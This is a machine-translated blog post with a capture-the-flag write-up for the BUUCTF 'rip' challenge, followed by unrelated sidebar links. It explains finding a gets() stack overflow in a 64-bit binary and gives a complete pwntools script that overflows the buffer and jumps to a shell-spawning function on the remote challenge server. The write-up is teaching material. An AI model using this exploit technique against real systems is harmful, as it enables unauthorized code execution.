当前位置:网站首页>BUUCTF -rip
BUUCTF -rip
2022-07-23 23:32:00 【Long street 395】
List of articles
One 、 see file
First file ./pwn1 Check the file type and then checksec --file=pwn1 Check the file protection .
Get the information :64 position , All protections are not turned on .
Two 、 Use IDA decompile
use IDA Pro 64bit open pwn1 Post press F5 Disassemble the source code and check the main function , Find out gets() Function reads input to variable s in ,s The length of is only 0xf, The stack size is only 15 byte , however gets() Function does not restrict input , Obviously, there is a stack overflow vulnerability .
stay Functions window You can see there's one fun() function :
And fun() The starting address of the function is 0x401186.
3、 ... and 、 Code
from pwn import *
# remote() Establish a remote connection , To specify ip and port
io = remote('node4.buuoj.cn', 25649)
payload = b'a'*(0xf + 0x8) + p64(0x40118A)
io.sendline(payload) # send data
io.interactive() # And shell Interact
边栏推荐
- USB Foundation
- 第五章、实现Web适配器
- J9 number theory: how can we overcome the fomo phenomenon in the digital industry?
- Analysis of mobile semantics and perfect forwarding
- iptables防止nmap扫描以及binlog
- TOPSIS method (matlab)
- Galaxy Securities opens an account online. Is it safe to open an account on your mobile phone
- 礪夏行動|源啟數字化:既有模式,還是開源創新?
- Baidu editor uploads pictures and sets custom directories
- solo 文章正文含有 <> 标签会影响到页面样式
猜你喜欢
ciscn_2019_c_1
Series of articles | the way to advance the microservice architecture in the cloud native era - best practices of microservice splitting
Open source embedded sig in the openeuler community. Let's talk about its multi OS hybrid deployment framework
USB转CAN设备在核酸提取仪 高性能USB接口CAN卡
The canfd/can interface offline burning operation instructions of h7-tool have been updated (2022-07-12)
Mongodb database + graphical tools download, installation and use
在openEuler社区开源的Embedded SIG,来聊聊它的多 OS 混合部署框架
Grey correlation analysis (matlab)
难怪国内企业ERP应用效果普遍不理想
bjdctf_2020_babystack
随机推荐
[leetcode ladder] the penultimate node in the 022 linked list
Basic operations of AutoCAD
pwn1_sctf_2016
anchor free yolov1
史上最全的2022年版Android面试题
BGP选路,MPLS
TAP 系列文章7 | 易于管理的流水线配置
Software architecture
Analytic hierarchy process (matlab)
The canfd/can interface offline burning operation instructions of h7-tool have been updated (2022-07-12)
Is the height of binary tree [log2n]+1 equal to log2 (n+1)
The most complete 2022 Android interview questions in history
Three network modes of VMware virtual machine
Can Intel NUC replace the host_ It's finally perfect! The latest Intel NUC Mini host comes online
浅析基于NVR技术的视频能力与未来发展趋势
SecureCRT garbled
Intel英特尔RealSense实感深度摄像头 自校准(Self-Calibration)操作步骤讲解 D400系列适用
bjdctf_2020_babystack
strncat() strncmp()
[tensorflow] check whether tensorflow GPU is available